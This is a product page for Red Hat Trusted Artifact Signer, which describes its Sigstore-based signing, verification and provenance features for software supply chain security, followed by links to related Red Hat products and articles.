Red Hat Trusted Artifact Signer
Enables cryptographic signing, verification of software, and provenance metadata.
What is Red Hat Trusted Artifact Signer?
Red Hat Trusted Artifact Signer enhances software supply chain security by simplifying cryptographic signing and verification of software artifacts, such as container images, binaries, and documents. Trusted Artifact Signer provides a production-ready deployment of the Sigstore project in Red Hat Trusted Software Supply Chain.
Enterprises adopting it can meet signing-related criteria for achieving Supply Chain Levels for Software Artifacts (SLSA) compliance and have greater confidence in the security and trustworthiness of their software supply chains.
Red Hat Trusted Artifact Signer is generally available now
Accelerate application with digital signatures
Ensure authenticity and integrity by increasing trust on artifacts by providing auditable logs, secure signing mechanisms, and user identity verification that enhance the transparency and accountability of the software supply chain. Cryptographic signing provides integrity, non-repudiation and authentication of artifacts.
Reduce complexity by eliminating the need for maintaining a key management system to ensure tamper-free artifacts and containers. We provide identity-based signing through our integration with OpenID Connect (OIDC). This provides easy integration with existing key management systems to authenticate and verify artifacts and containers.
Stay compliant by meeting signing-related criteria for achieving Supply Chain Levels for Software Artifacts (SLSA) standards. Provenance is generated automatically as part of the build process in Red Hat Trusted Application Pipeline, for enterprise contracts integrated with cryptographic signatures to establish a non-repudiable chain of custody, and verify pipeline compliance to industry requirements (SLSA) are met.
Integratrations
Trusted Artifact Signer is a production-ready deployment of the Sigstore project within an enterprise. Sigstore has witnessed rampant adoption in the open source community. Package managers such as NPM, Python, and Maven are in the process of adopting sigstore for the attestation of all published packages produced within each ecosystem. It has also become the de-facto signing system for containers, having seen Kubernetes standardized on sigstore. Multiple Red Hat products have adopted or are in the process of integrating sigstore, including Podman, Quay, Ansible, Red Hat Advanced Cluster Security (ACS), StoneSoup / HACBS, and Red Hat Trusted Content.
Featured products
Red Hat Trusted Profile Analyzer
Use your software assets with confidence. Curate your trusted content by...
Red Hat Trusted Software Supply Chain
Consistently code, build, and monitor for a trusted software supply chain...
Red Hat Trusted Application Pipeline
Catch vulnerabilities early with a self-serve developer experience imbued...
Red Hat Developer Hub
An enterprise-grade, open developer platform for building developer portals,...
Featured resources
A developer’s guide to setting supply chain security in DevSecOps
White paper: Tackling CI/CD Security Anti-Patterns
Analyst brief: Getting started with CI/CD Pipeline Security
A blueprint for supply chain security
Latest blogs & articles
Establishing software supply chain security: Jenkins with Red Hat Trusted Artifact...
As cyber threats become increasingly sophisticated, organizations need...
Red Hat Trusted Application Pipeline - 1.0.2 Maintenance Release
1.0.2 Maintenance Release Announcement In case you were wondering why...
Red Hat Trusted Software Supply Chain is now available
Discover how Red Hat Trusted Software Supply Chain makes it easier to create,...
An introduction to Red Hat Trusted Application Pipeline
Discover more about Red Hat Trusted Application Pipeline, a secure and easy...